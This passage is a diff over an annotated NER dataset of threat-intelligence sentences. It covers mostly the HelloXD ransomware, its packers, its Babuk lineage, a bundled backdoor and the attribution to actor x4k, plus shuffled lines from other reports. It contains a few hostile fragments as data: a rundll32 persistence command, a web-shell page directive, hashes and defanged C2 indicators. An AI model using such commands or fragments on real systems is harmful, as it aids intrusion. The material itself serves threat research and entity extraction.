message:","entities":[],"relations":[],"Comments":[]} -{"id":2006,"text":" After those commands are executed, the ransomware finishes by appending the file extension .hello, alongside a ransom note titled Hello.txt (Figure 2).","entities":[{"id":47113,"label":"FILEPATH","start_offset":131,"end_offset":140}],"relations":[],"Comments":[]} -{"id":2007,"text":" The ransom note was modified between the observed samples.","entities":[],"relations":[],"Comments":[]} -{"id":2008,"text":"In the first sample we encountered (Figure 3, left), the ransom note only linked to a TOX ID, whereas a later observed sample (Figure 3, right) links to an onion domain as well as a TOX ID (different from the one in the first version).","entities":[],"relations":[],"Comments":[]} -{"id":2009,"text":"At the time of writing, this site is down.","entities":[],"relations":[],"Comments":[]} -{"id":2010,"text":" The ransomware creates an ID for the victim which has to be sent to the threat actor to make it possible to identify the victim and provide a decryptor.","entities":[],"relations":[],"Comments":[]} -{"id":2011,"text":"The ransom note also instructs victims to download Tox and provides a Tox Chat ID to reach the threat actor.","entities":[],"relations":[],"Comments":[]} -{"id":2012,"text":"Tox is a peer-to-peer instant messaging protocol that offers end-to-end encryption and has been observed being used by other ransomware groups for negotiations.","entities":[],"relations":[],"Comments":[]} -{"id":2013,"text":"For example, LockBit 2.0 leverages Tox Chat for threat actor communications.","entities":[{"id":45221,"label":"malware","start_offset":13,"end_offset":24},{"id":45222,"label":"tools","start_offset":35,"end_offset":43}],"relations":[{"id":89,"from_id":45221,"to_id":45222,"type":"uses"}],"Comments":[]} -{"id":2014,"text":" When observing both variants executing on virtual environments, we noted that the more recent variants changed the background to a ghost – a theme we’ve noticed in this threat actor’s work since our earliest observations of it.","entities":[{"id":5960,"label":"malware","start_offset":132,"end_offset":137}],"relations":[],"Comments":[]} -{"id":2015,"text":"However, the previous version didn’t change the background at all – it simply left the ransom note we observed previously (Figure 4). During analysis and threat intel gathering, we discovered two main packers used for HelloXD ransomware binaries, as well as for other malware samples linked to the potential author (Figure 5).","entities":[{"id":47114,"label":"malware","start_offset":219,"end_offset":226}],"relations":[],"Comments":[]} -{"id":2016,"text":"The first type of packer is a modified version of UPX.","entities":[{"id":45223,"label":"tools","start_offset":50,"end_offset":53}],"relations":[],"Comments":[]} -{"id":2017,"text":"The code is extremely similar between UPX-packed binaries and the custom packer, however the custom packer avoids using identifiable section names such as .UPX0 and .UPX1, and leaves the default .text, .data, and .rsrc names unchanged.","entities":[{"id":47115,"label":"tools","start_offset":38,"end_offset":42}],"relations":[],"Comments":[]} -{"id":2018,"text":"There are also no magic bytes within the packed payload, unlike UPX-packed binaries, which contain the magic bytes UPX!.","entities":[{"id":47116,"label":"tools","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} -{"id":2019,"text":" However, a dead giveaway that the sample is packed is the raw size of the .text section, which is zeroed out, while the virtual size is much larger, as expected; this is identical to a .UPX0 section.","entities":[],"relations":[],"Comments":[]} -{"id":2020,"text":"As there is no data within the .text section on disk, the entry point of the unpacking stub is within the .data section, which will unpack the malicious code into the .text section on runtime.","entities":[],"relations":[],"Comments":[]} -{"id":2021,"text":" All of these details point toward the threat actor having modified or copied certain elements from the UPX packer, which can be further confirmed by comparing a UPX-packed binary with a custom-packed HelloXD binary.","entities":[{"id":47117,"label":"malware","start_offset":201,"end_offset":208},{"id":47118,"label":"tools","start_offset":104,"end_offset":114}],"relations":[],"Comments":[]} -{"id":2022,"text":" The second packer we discovered consists of two layers, with the second being the custom UPX packer discussed above.","entities":[{"id":47119,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} -{"id":2023,"text":"This particular packer seems to be more common on x64 binaries and involves decrypting embedded blobs using a seemingly custom algorithm containing unconventional instructions such as XLAT (Figure 6). Aside from storing the encrypted second layer, there is little to no obfuscation within the packer; API calls such as VirtualAlloc and VirtualProtect are clearly visible, and there is no control flow obfuscation.","entities":[],"relations":[],"Comments":[]} -{"id":2024,"text":" We have observed two different samples of the HelloXD ransomware publicly available, indicating it is still under development by the author(s).","entities":[{"id":6000,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} -{"id":2025,"text":"The first sample is fairly rudimentary, with minimal obfuscation and typically paired with an obfuscated loader responsible for decrypting it through the use of the WinCrypt API before injecting it into memory.","entities":[{"id":45225,"label":"SOFTWARE","start_offset":165,"end_offset":173}],"relations":[],"Comments":[]} -{"id":2026,"text":"The second sample, on the other hand, is far more obfuscated, and is executed in memory by a packer rather than a full-scale loader.","entities":[],"relations":[],"Comments":[]} -{"id":2027,"text":"While the obfuscation and execution may differ between the two, both samples contain very similar core functionality, due to the author copying the leaked Babuk\/Babyk source code in order to develop the HelloXD ransomware (Figure 7).","entities":[{"id":47122,"label":"malware","start_offset":203,"end_offset":210},{"id":47121,"label":"malware","start_offset":161,"end_offset":166},{"id":47120,"label":"malware","start_offset":155,"end_offset":160}],"relations":[{"id":303,"from_id":47121,"to_id":47122,"type":"variant-of"},{"id":304,"from_id":47120,"to_id":47122,"type":"variant-of"}],"Comments":[]} -{"id":2028,"text":"As a result, a lot of the function structure overlaps with Babuk, after getting past the obfuscation.","entities":[{"id":47123,"label":"malware","start_offset":59,"end_offset":64}],"relations":[],"Comments":[]} -{"id":2029,"text":" Table 1. Ransomware sample comparison summary.","entities":[],"relations":[],"Comments":[]} -{"id":2030,"text":" While there is a lot of overlap between HelloXD and Babuk, there are some small but crucial differences to take note of between Babuk and the two different variants. HelloXD version 1 is the least modified, utilizing Curve25519-Donna and a modified HC-128 algorithm to encrypt file data, while also containing the same CRC hashing routine incorporating the string dong, possibly referencing Chuong Dong, who had previously analyzed and reported on the first version of Babuk (Figure 8).","entities":[{"id":47125,"label":"malware","start_offset":53,"end_offset":58},{"id":47127,"label":"malware","start_offset":168,"end_offset":175},{"id":47128,"label":"malware","start_offset":471,"end_offset":476},{"id":47129,"label":"identity","start_offset":393,"end_offset":404},{"id":47124,"label":"malware","start_offset":41,"end_offset":48},{"id":47126,"label":"malware","start_offset":129,"end_offset":134}],"relations":[{"id":305,"from_id":47124,"to_id":47125,"type":"variant-of"}],"Comments":[]} -{"id":2031,"text":" The HelloXD author(s) did modify the infamous file marker and mutex however, opting for dxunmgqehhehyrhtxywuhwrvzxqrcblo as the file marker and With best wishes And good intentions… as the mutex (Figure 9).","entities":[{"id":47130,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} +{"id":2819,"text":" The attack uses this vulnerability to spread the WanaCrypt0r ransomware on the network.","entities":[{"id":8612,"label":"malware","start_offset":50,"end_offset":61}],"relations":[],"Comments":[]} +{"id":1165,"text":"Idiosyncrasies of the malware author become apparent, the evolution can be traced, the availability or quality of code deduced, and reuse of functionality made clear with a simple mutex.","entities":[],"relations":[],"Comments":[]} +{"id":6979,"text":" Figure 14. CrimsonRAT malware hosted in viral91[.]xyz We were also able to source a phishing document, \u201ccsd_car_price_list_2017,\u201d that is related to this domain and has been seen in the wild in 2017.","entities":[{"id":21868,"label":"attack-pattern","start_offset":84,"end_offset":90},{"id":21869,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21870,"label":"location","start_offset":170,"end_offset":173}],"relations":[],"Comments":[]} +{"id":11807,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[{"id":36416,"label":"location","start_offset":83,"end_offset":86},{"id":36417,"label":"location","start_offset":126,"end_offset":129},{"id":36418,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":36419,"label":"location","start_offset":168,"end_offset":173},{"id":36420,"label":"location","start_offset":177,"end_offset":181},{"id":36421,"label":"location","start_offset":182,"end_offset":186}],"relations":[],"Comments":[]} +{"id":517,"text":"From this lens, the top three families observed are Ryuk (31.7%), Sodinokibi (20%) and Maze (15%). Emails are still the most efficient method to deliver and propagate ransomware.","entities":[{"id":46146,"label":"malware","start_offset":52,"end_offset":56},{"id":46147,"label":"malware","start_offset":66,"end_offset":76},{"id":46148,"label":"malware","start_offset":87,"end_offset":91}],"relations":[],"Comments":[]} +{"id":3659,"text":"Although both names have at times been used to refer to the same group, organizations such as MITRE identifies them as two separate entities that wield the Carbanak backdoor in their attacks.","entities":[{"id":49429,"label":"identity","start_offset":94,"end_offset":99},{"id":49432,"label":"malware","start_offset":156,"end_offset":173}],"relations":[],"Comments":[]} +{"id":2598,"text":" Apart from Argentinian eCommerce provider Mercado Libre \/ Mercado Pago, subsequent victimology has departed South America and pivoted to focus on the high-tech sector. Recent public victims have included: It should be understood that in addition there are likely any number of other victims, targeted by attacks not known in the public sphere.","entities":[{"id":45606,"label":"location","start_offset":12,"end_offset":23},{"id":45608,"label":"identity","start_offset":43,"end_offset":56},{"id":45609,"label":"identity","start_offset":59,"end_offset":71},{"id":45610,"label":"location","start_offset":109,"end_offset":122}],"relations":[{"id":357,"from_id":45608,"to_id":45606,"type":"located-at"},{"id":358,"from_id":45609,"to_id":45606,"type":"located-at"},{"id":359,"from_id":45609,"to_id":45608,"type":"related-to"}],"Comments":[]} +{"id":823,"text":" The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programming Interface (API) function was added.","entities":[{"id":46371,"label":"SOFTWARE","start_offset":23,"end_offset":32}],"relations":[],"Comments":[]} +{"id":3969,"text":"Use multi-factor authentication whenever possible and regularly update it.","entities":[],"relations":[],"Comments":[]} +{"id":10872,"text":"Similar malicious samples","entities":[],"relations":[],"Comments":[]} +{"id":12804,"text":"All Roads Lead to BlackTech","entities":[{"id":39873,"label":"threat-actor","start_offset":10,"end_offset":14},{"id":39874,"label":"threat-actor","start_offset":18,"end_offset":27}],"relations":[],"Comments":[]} +{"id":520,"text":"Web browsing is the second most common entry vector for ransomware infections.","entities":[],"relations":[],"Comments":[]} +{"id":357,"text":" As Heartbleed allows the attacker to scrape memory from the vulnerable device, they can retrieve significant amounts of secret information.","entities":[{"id":44716,"label":"attack-pattern","start_offset":38,"end_offset":51},{"id":44715,"label":"vulnerability","start_offset":4,"end_offset":14}],"relations":[{"id":153,"from_id":44715,"to_id":44716,"type":"targets"}],"Comments":[]} +{"id":211,"text":" Additionally the kernel module responsible for the actual wiping activity is from a legitimate application called EaseUS Partition Master.","entities":[{"id":45907,"label":"tools","start_offset":115,"end_offset":138}],"relations":[],"Comments":[]} +{"id":2400,"text":"The CVE-2022-22965 vulnerability allows an attacker unauthenticated remote code execution (RCE), which Unit 42 has observed being exploited in the wild.","entities":[{"id":45495,"label":"vulnerability","start_offset":4,"end_offset":18},{"id":45496,"label":"attack-pattern","start_offset":52,"end_offset":89},{"id":45497,"label":"identity","start_offset":103,"end_offset":110}],"relations":[{"id":105,"from_id":45496,"to_id":45495,"type":"delivers"}],"Comments":[]} +{"id":658,"text":"The WannaCry attacks in May, 2017 demonstrated that many Windows systems had not been patched for this vulnerability.","entities":[{"id":2160,"label":"malware","start_offset":4,"end_offset":12},{"id":46236,"label":"TIME","start_offset":24,"end_offset":33},{"id":46237,"label":"SOFTWARE","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} +{"id":7325,"text":"Figure 21.","entities":[],"relations":[],"Comments":[]} +{"id":3702,"text":"To steal these, both groups employed credential dumping and input capture.","entities":[{"id":11230,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":11232,"label":"attack-pattern","start_offset":60,"end_offset":73}],"relations":[],"Comments":[]} +{"id":10298,"text":"Troj.Win32.TRX.XXPE50FFF039 b61e0f68772f3557024325f3a05e4edb940dbbe380af00f3bdaaaeabda308e72 igmtSX.exe","entities":[{"id":31450,"label":"SHA1","start_offset":29,"end_offset":93}],"relations":[],"Comments":[]} +{"id":12997,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":40484,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} +{"id":9648,"text":"For regular user path: ~\/Library\/Spelling\/ processname: spellagentd","entities":[],"relations":[],"Comments":[]} +{"id":2341,"text":"These two functions are used in conjunction to dynamically load a shared object into memory and retrieve the address of a symbol from it.","entities":[],"relations":[],"Comments":[]} +{"id":9750,"text":"Running this registry file adds the following command to the Run registry key: rundll32 %Temp%\\png.dll,RunPow Figure 3.","entities":[{"id":29734,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} +{"id":13128,"text":"The expansive use of open source code by DevOps teams adds another element of risk which requires urgent attention.","entities":[],"relations":[],"Comments":[]} +{"id":10178,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":31068,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} +{"id":4027,"text":"It is our aim, through this article, to encourage enterprises to review their own security setting and protect themselves from damage and compromise.","entities":[],"relations":[],"Comments":[]} +{"id":1668,"text":"The client combines this with the password and generates the same key.","entities":[],"relations":[],"Comments":[]} +{"id":3774,"text":" Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.","entities":[{"id":49607,"label":"SOFTWARE","start_offset":1,"end_offset":14},{"id":49608,"label":"SOFTWARE","start_offset":54,"end_offset":81}],"relations":[],"Comments":[]} +{"id":10132,"text":"The method, which we first discussed in 2014, involves changing a browser tab to point to a phishing site after distracting the target.","entities":[{"id":30896,"label":"location","start_offset":74,"end_offset":77},{"id":30897,"label":"location","start_offset":81,"end_offset":86},{"id":30898,"label":"attack-pattern","start_offset":92,"end_offset":100},{"id":30899,"label":"location","start_offset":128,"end_offset":134}],"relations":[],"Comments":[]} +{"id":1754,"text":"In his slides, he mentioned that a \"god mode\" of Internet Explorer could be turned on by a one byte overwrite.","entities":[{"id":46906,"label":"SOFTWARE","start_offset":49,"end_offset":66}],"relations":[],"Comments":[]} +{"id":1592,"text":" Version Summary October 24, 2017 2:30 p.m. PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46837,"label":"TIME","start_offset":18,"end_offset":47}],"relations":[],"Comments":[]} +{"id":1773,"text":" Here, xyz indicates a user-controlled address that contains the length of a vector object or length of an Int32Array.","entities":[],"relations":[],"Comments":[]} +{"id":2334,"text":"day or 0-day?","entities":[],"relations":[],"Comments":[]} +{"id":204,"text":" On Feb. 18, both the United States and the United Kingdom attributed these DDoS attacks to Russia\u2019s Main Intelligence Directorate (GRU). Over the past week, Ukraine has continued to observe a relatively constant flow of DDoS attacks targeting its government and financial institutions.","entities":[{"id":44621,"label":"identity","start_offset":22,"end_offset":35},{"id":44622,"label":"TIME","start_offset":4,"end_offset":11},{"id":44623,"label":"identity","start_offset":44,"end_offset":58},{"id":44624,"label":"attack-pattern","start_offset":76,"end_offset":80},{"id":44625,"label":"threat-actor","start_offset":92,"end_offset":136},{"id":44626,"label":"identity","start_offset":159,"end_offset":166},{"id":44627,"label":"attack-pattern","start_offset":222,"end_offset":234},{"id":44628,"label":"identity","start_offset":249,"end_offset":286}],"relations":[{"id":4,"from_id":44624,"to_id":44625,"type":"attributed-to"},{"id":131,"from_id":44627,"to_id":44628,"type":"targets"}],"Comments":[]} +{"id":14021,"text":"Instead, it is determined by the operating system language at the time of the version resource inclusion.","entities":[],"relations":[],"Comments":[]} +{"id":907,"text":" Once files are identified, PClock will begin encrypting them, one-by-one.","entities":[{"id":46430,"label":"malware","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} +{"id":7618,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} +{"id":479,"text":"About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} +{"id":7265,"text":" Figures 1-2.","entities":[],"relations":[],"Comments":[]} +{"id":4929,"text":"This means that there is typically more than one threat actor behind the warnings.","entities":[],"relations":[],"Comments":[]} +{"id":5427,"text":"Having a distributed infrastructure also makes it more difficult for cybersecurity teams to take down the whole attack.","entities":[],"relations":[],"Comments":[]} +{"id":7138,"text":"This shows that the threat actors intended to confuse forensics investigators with incorrect timestamps, which is why it\u2019s critical to analyze timestamps with caution during investigations.","entities":[],"relations":[],"Comments":[]} +{"id":8501,"text":"This is the second directive the TSA issued to the pipeline sector this 2021, building on the initial Security Directive released on May 2021 following the ransomware attack on Colonial Pipeline by DarkSide.","entities":[],"relations":[],"Comments":[]} +{"id":14126,"text":"At the same time, we were able to locate the Mattermost server hosted in Greece, and that gave us the current time zone of the Mattermost server.","entities":[{"id":48192,"label":"location","start_offset":73,"end_offset":79},{"id":48191,"label":"Infrastucture","start_offset":127,"end_offset":144},{"id":48193,"label":"Infrastucture","start_offset":45,"end_offset":62}],"relations":[{"id":392,"from_id":48191,"to_id":48192,"type":"located-at"},{"id":393,"from_id":48193,"to_id":48192,"type":"located-at"}],"Comments":[]} +{"id":3542,"text":"Trend Micro solutions","entities":[{"id":49318,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":2602,"text":"Several of the Lapsus$ Group\u2019s attacks involved the theft and publication of source code.","entities":[{"id":47790,"label":"threat-actor","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} +{"id":3742,"text":"This is also the earliest date at which Unit 42 observed exploitation attempts and scanning activity. 2022-04-13: VMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.","entities":[{"id":49562,"label":"TIME","start_offset":103,"end_offset":113},{"id":49563,"label":"identity","start_offset":115,"end_offset":121},{"id":49561,"label":"identity","start_offset":40,"end_offset":47},{"id":49564,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} +{"id":2491,"text":" While CVE-2022-22963 is a different vulnerability in Spring Cloud Function (not technically part of SpringShell), a Threat Prevention signature is also available to ensure coverage at the perimeter.","entities":[{"id":47575,"label":"vulnerability","start_offset":101,"end_offset":112},{"id":47573,"label":"vulnerability","start_offset":7,"end_offset":21},{"id":47574,"label":"SOFTWARE","start_offset":54,"end_offset":66}],"relations":[{"id":341,"from_id":47574,"to_id":47573,"type":"has"}],"Comments":[]} +{"id":13826,"text":"The rest of the routine is all placed in \u201cGetRTTAndHopCount.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":6925,"text":"Exploiting CVE-2019-0676 enabled attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered.","entities":[],"relations":[],"Comments":[]} +{"id":8032,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":24913,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":24914,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} +{"id":3282,"text":"It writes the basic config and RTMP config of OBS and then starts the OBS process to monitor the victim\u2019s desktop using RTMP live streaming to the cloud.","entities":[],"relations":[],"Comments":[]} +{"id":3918,"text":"<%@ Page Language=\"Jscript\" Debug=true%>","entities":[],"relations":[],"Comments":[]} +{"id":4834,"text":"Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50791,"label":"attack-pattern","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} +{"id":855,"text":"And while this technique alone isn\u2019t solely responsible for the damaging power of WanaCrypt0r\/WannaCry and Petya\/NotPetya it is certainly an important contributing factor.","entities":[{"id":2781,"label":"malware","start_offset":82,"end_offset":93},{"id":2784,"label":"malware","start_offset":107,"end_offset":112},{"id":44893,"label":"malware","start_offset":94,"end_offset":102},{"id":44895,"label":"malware","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} +{"id":9416,"text":"This malware lineup includes tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, and a brand-new multistage malware family that we have dubbed PuppetLoader.","entities":[{"id":28978,"label":"location","start_offset":35,"end_offset":38},{"id":28979,"label":"malware","start_offset":96,"end_offset":101},{"id":28980,"label":"location","start_offset":102,"end_offset":105},{"id":28981,"label":"malware","start_offset":106,"end_offset":115},{"id":28982,"label":"location","start_offset":117,"end_offset":120},{"id":28983,"label":"location","start_offset":123,"end_offset":128},{"id":28984,"label":"malware","start_offset":179,"end_offset":191}],"relations":[],"Comments":[]} +{"id":13066,"text":"Published New White Paper: Practical Risk Assessments for Smart Factories","entities":[],"relations":[],"Comments":[]} +{"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} +{"id":7747,"text":"The attached document asks the user to enable the macros, which creates an Internet Explorer object instance.","entities":[],"relations":[],"Comments":[]} +{"id":11684,"text":"These documents and news are probably interesting in some way to their targets and are used to make them click and log in to the phishing pages.","entities":[{"id":35831,"label":"location","start_offset":16,"end_offset":19},{"id":35832,"label":"location","start_offset":25,"end_offset":28},{"id":35833,"label":"location","start_offset":58,"end_offset":61},{"id":35834,"label":"location","start_offset":79,"end_offset":82},{"id":35835,"label":"location","start_offset":83,"end_offset":86},{"id":35836,"label":"location","start_offset":100,"end_offset":104},{"id":35837,"label":"location","start_offset":111,"end_offset":114},{"id":35838,"label":"attack-pattern","start_offset":129,"end_offset":137}],"relations":[],"Comments":[]} +{"id":2232,"text":"In the event the supplied argument was C:\\malware.exe, the registry key would be named \u2018malware\u2019, and the path for this key would be \u2018C:\\malware.exe\u2019. The persistence thread runs in a loop where the registry keys are set every 60 seconds, ensuring persistence even in the event an administrator manually deletes the registry keys.","entities":[{"id":45426,"label":"FILEPATH","start_offset":39,"end_offset":53},{"id":45427,"label":"FILEPATH","start_offset":134,"end_offset":148},{"id":6655,"label":"TIME","start_offset":222,"end_offset":238}],"relations":[],"Comments":[]} +{"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} +{"id":4576,"text":"These phishing domains have been blocked through Google Safe Browsing \u2013 a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[],"relations":[],"Comments":[]} +{"id":3935,"text":"It proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.","entities":[{"id":49777,"label":"malware","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} +{"id":2304,"text":"iOS Exploits","entities":[{"id":45455,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":14357,"text":"The attackers were found using the HTTP protocol to transfer data.","entities":[],"relations":[],"Comments":[]} {"id":2032,"text":" With HelloXD version 2, the author(s) opted to alter the encryption routine, swapping out the modified HC-128 algorithm with the Rabbit symmetric cipher.","entities":[{"id":6049,"label":"malware","start_offset":6,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2033,"text":"Additionally, the file marker changed again, this time to what seems to be random bytes rather than a coherent string.","entities":[],"relations":[],"Comments":[]} -{"id":2034,"text":"The mutex is also modified, set to nqldslhumipyuzjnatqucmuycqkxjon in one of the samples (Figure 10).","entities":[],"relations":[],"Comments":[]} -{"id":2035,"text":" Both versions have been compiled with the same compiler (believed to be GCC 3.x and above based on the mangling of export names), resulting in very similar exports between not only the ransomware variants, but also other malware that we have linked to the potential author (Figure 11). The biggest difference between the versions is the interesting addition of a secondary payload embedded within version 2.","entities":[{"id":47131,"label":"SOFTWARE","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} -{"id":2036,"text":"This payload is encrypted using the WinCrypt API, in the same fashion as the obfuscated loader discussed above.","entities":[],"relations":[],"Comments":[]} -{"id":2037,"text":"Once decrypted, the payload is dropped to System32 with the name userlogin.exe before a service is created that points to it.","entities":[{"id":45228,"label":"FILEPATH","start_offset":65,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2038,"text":"userlogin.exe is then executed (Figure 12). ","entities":[],"relations":[],"Comments":[]} -{"id":2039,"text":"What is peculiar about this file is it is a variant of the open-source MicroBackdoor, a backdoor allowing an attacker to browse the file system, upload and download files, execute commands and remove itself from the system (Figure 13).","entities":[{"id":47132,"label":"malware","start_offset":71,"end_offset":84}],"relations":[],"Comments":[]} -{"id":2040,"text":"As the threat actor would normally have a foothold into the network prior to ransomware deployment, it raises the question of why this backdoor is part of the ransomware execution.","entities":[],"relations":[],"Comments":[]} -{"id":2041,"text":"One possibility is that it is used to monitor ransomed systems for blue team and incident response (IR) activity, though even in that case it is unusual to see offensive tools dropped at this point in the infection.","entities":[],"relations":[],"Comments":[]} -{"id":2042,"text":"While analyzing the ransomware binaries, we discovered a unique string prevalent in almost all of the samples: :wtfbbq (stored as UTF-16LE).","entities":[],"relations":[],"Comments":[]} -{"id":2043,"text":"Querying VirusTotal with this string led to the discovery of eight files, six of which could be directly attributed to x4k through their own VirusTotal graph mapping out their infrastructure.","entities":[{"id":45229,"label":"SOFTWARE","start_offset":9,"end_offset":19},{"id":45230,"label":"threat-actor","start_offset":119,"end_offset":122},{"id":45231,"label":"SOFTWARE","start_offset":141,"end_offset":151}],"relations":[],"Comments":[]} -{"id":2044,"text":"The discovered samples are primarily Cobalt Strike Beacons, utilizing heavy control flow obfuscation – unlike the HelloXD ransomware samples we had previously seen.","entities":[{"id":47133,"label":"tools","start_offset":37,"end_offset":58},{"id":47134,"label":"malware","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} -{"id":2045,"text":" Unfortunately, this specific string is not completely unique to x4k, and is instead found on several GitHub repositories as part of a technique to allow a running executable to delete itself from disk through renaming primary data streams within the file to :wtfbbq.","entities":[{"id":47135,"label":"threat-actor","start_offset":65,"end_offset":68},{"id":47136,"label":"SOFTWARE","start_offset":102,"end_offset":108}],"relations":[],"Comments":[]} -{"id":2046,"text":"Running a search for the non-UTF-16LE string results in multiple files, and filtering for executables yields 10 results, the majority of which are NIM-based binaries – potentially linked to this GitHub repository.","entities":[{"id":45232,"label":"SOFTWARE","start_offset":195,"end_offset":212}],"relations":[],"Comments":[]} -{"id":2047,"text":" While the :wtfbbq string is not unique to x4k, by searching for the UTF-16LE version found inside the analyzed HelloXD ransomware samples, we only came across binaries linked to x4k’s infrastructure, providing a fairly strong link between HelloXD and x4k.","entities":[{"id":6089,"label":"malware","start_offset":112,"end_offset":119},{"id":6093,"label":"malware","start_offset":240,"end_offset":247},{"id":47137,"label":"threat-actor","start_offset":43,"end_offset":46},{"id":47139,"label":"threat-actor","start_offset":252,"end_offset":255},{"id":47138,"label":"threat-actor","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} -{"id":2048,"text":" The backdoor provided extremely useful insight into the potential threat actor behind the ransomware, as it had the following hardcoded IP address to use as the command and control (C2): 193[.]242[.]145[.]158.","entities":[{"id":6096,"label":"IPV4","start_offset":188,"end_offset":209}],"relations":[],"Comments":[]} -{"id":2049,"text":"Upon navigating to this IP address, we observed an email address – tebya@poime[.]li – on the page title, the first link in the chain of attribution (Figure 14). Using the email address as a pivot, we identified additional domains that were linked to tebya@poime[.]li.","entities":[{"id":45233,"label":"EMAIL","start_offset":67,"end_offset":83},{"id":45234,"label":"EMAIL","start_offset":251,"end_offset":267}],"relations":[],"Comments":[]} -{"id":2050,"text":"Table 2.","entities":[],"relations":[],"Comments":[]} -{"id":2051,"text":"Domains linked to tebya@poime.li Some of them historically resolved to some malicious IPs, which led us to discover additional infrastructure and malware being hosted in other domains (Table 3).","entities":[{"id":47140,"label":"EMAIL","start_offset":18,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2052,"text":"Many of these also use the x4k name in the domain.","entities":[{"id":45235,"label":"threat-actor","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} -{"id":2053,"text":" Table 3. PDNS of 164[.]68[.]114[.]29 and 167[.]86[.]87[.]27 When looking at this infrastructure on VirusTotal, we observed that some of the domains we found were part of a VirusTotal graph called a.y.e\/ created by the user x4k on June 30, 2021.","entities":[{"id":6107,"label":"IPV4","start_offset":18,"end_offset":37},{"id":6109,"label":"IPV4","start_offset":42,"end_offset":60},{"id":47141,"label":"SOFTWARE","start_offset":101,"end_offset":111},{"id":47142,"label":"TIME","start_offset":232,"end_offset":245},{"id":47143,"label":"threat-actor","start_offset":225,"end_offset":228},{"id":47144,"label":"SOFTWARE","start_offset":174,"end_offset":184}],"relations":[],"Comments":[]} -{"id":2054,"text":"On this graph, we found his infrastructure mapped out and malicious files that were also linked to the domains.","entities":[],"relations":[],"Comments":[]} -{"id":2055,"text":"This, however, was not the only graph we observed x4k creating.","entities":[{"id":45236,"label":"threat-actor","start_offset":50,"end_offset":53}],"relations":[],"Comments":[]} -{"id":2056,"text":"We also encountered additional graphs, mapping different things such as “Russian Hosts,” “DDoS Guard” and others, dating back to August 10, 2020 (Figure 15).","entities":[{"id":47146,"label":"TIME","start_offset":129,"end_offset":144}],"relations":[],"Comments":[]} -{"id":2057,"text":" Additionally, we observed the initial email being linked to a GitHub account (Figure 16), as well as various forums including XSS, a known Russian-speaking hacking forum created to share knowledge about exploits, vulnerabilities, malware and network penetration.","entities":[{"id":47147,"label":"attack-pattern","start_offset":127,"end_offset":130},{"id":47148,"label":"SOFTWARE","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} -{"id":2058,"text":"From the GitHub page, we also observed a URL to a site – xn--90a5ai[.]com(фсб[.]com) – resolving to the previously mentioned IP 164[.]68[.]114[.]29, which at this point in time only shows an animation of interconnecting 